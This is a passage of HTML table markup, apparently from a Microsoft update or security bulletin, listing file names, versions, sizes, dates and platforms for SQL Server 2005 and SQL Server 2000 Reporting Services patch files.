class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msolap90.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">4300312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msolap90.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">7915032</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxmlsql.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">2733592</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">nlhtml.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">295784</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">nls400.dll</td><td class=\"sbody-td\">5.0.4217.0</td><td class=\"sbody-td\">14750056</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">nsservice.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">21528</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">odsole70.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">179224</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">osql.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">125464</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">query.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">123240</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">rdistcom.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1887256</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">repldp.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">187928</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">repldp.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">513560</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replerrx.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">114712</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replerrx.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">310296</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replisapi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">272920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replisapi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">784920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replmerg.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">957976</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replprov.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">554520</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replprov.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1630744</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replrec.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">786968</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replrec.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">2151448</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replsub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">408088</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replsub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1160216</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">replsync.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">278040</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.application</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">18796</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">5616664</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.exe.manifest</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">45326</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1066008</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1070104</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1070104</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1082392</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1090584</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1090584</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1094680</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilder.resources.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1094680</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilderlocalintranet.application</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">18848</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportbuilderlocalintranet.exe.manifest</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">37420</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesemaildeliveryprovider.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">82968</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceslibrary.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1119256</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesnativeserver.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">274456</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesservice.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">16920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebserver.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1725464</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebuserinterface.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1332248</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswmi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">3382296</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswmi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">4218392</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">rsclientprint.cab</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1185621</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:10</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sac.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">82968</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlaccess.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">351768</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqladhlp90.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">114712</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlagent90.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1252888</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlbrowser.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">503832</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlcmd.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">533016</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlctr90.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">67608</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlctr90.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">131096</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqldiag.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1774104</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqldumper.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">68632</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqldumper.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">188952</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlmaint.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">244248</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlmanagerui.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">6083608</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlmergx.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">445976</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlmgmprovider.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">236568</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlmgmprovider.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">618008</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlrepss90.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">66584</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlsac.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1246232</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlservr.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">72653336</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlsqm.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">140312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwb.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">823832</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwep.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">90648</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwep.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">220696</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwtsn.exe</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">99352</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqsrvres.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">146968</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssradd.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">42520</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssradd.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">94744</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssravg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">43032</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssravg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">94744</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmax.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">40984</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmax.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">88088</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">40984</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrmin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">88088</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrpub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">30232</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ssrpub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">64536</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">svrenumapi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">614936</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">svrenumapi.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">2351128</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">tablediff.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">87064</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">thawbrkr.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">253288</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txagg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">204312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txagg.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">784920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txlookup.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">244760</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txlookup.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">858136</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txmergejoin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">140824</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">txmergejoin.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">523288</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xmlfilt.dll</td><td class=\"sbody-td\">12.0.7822.0</td><td class=\"sbody-td\">445800</td><td class=\"sbody-td\">22-Jun-07</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xmlsub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">194584</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xmlsub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">592408</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xmlsub.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">592408</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xpadsi90.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">126488</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xpqueue.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">119832</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xprepl.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">169496</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">xpstar90.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">967192</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:12</td><td class=\"sbody-td\">ia64</td></tr></table></div><h4 class=\"sbody-h4\">For SQL Server 2000 Reporting Services Service Pack 2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.csvrendering.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">57344</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.diagnostics.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">270336</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.diagnostics.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">270336</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.excelrendering.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">364544</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.htmlrendering.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">389120</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.imagerendering.dll</td><td class=\"sbody-td\">8.0.1062.0</td><td class=\"sbody-td\">262144</td><td class=\"sbody-td\">4-Aug-08</td><td class=\"sbody-td\">22:01</td><td 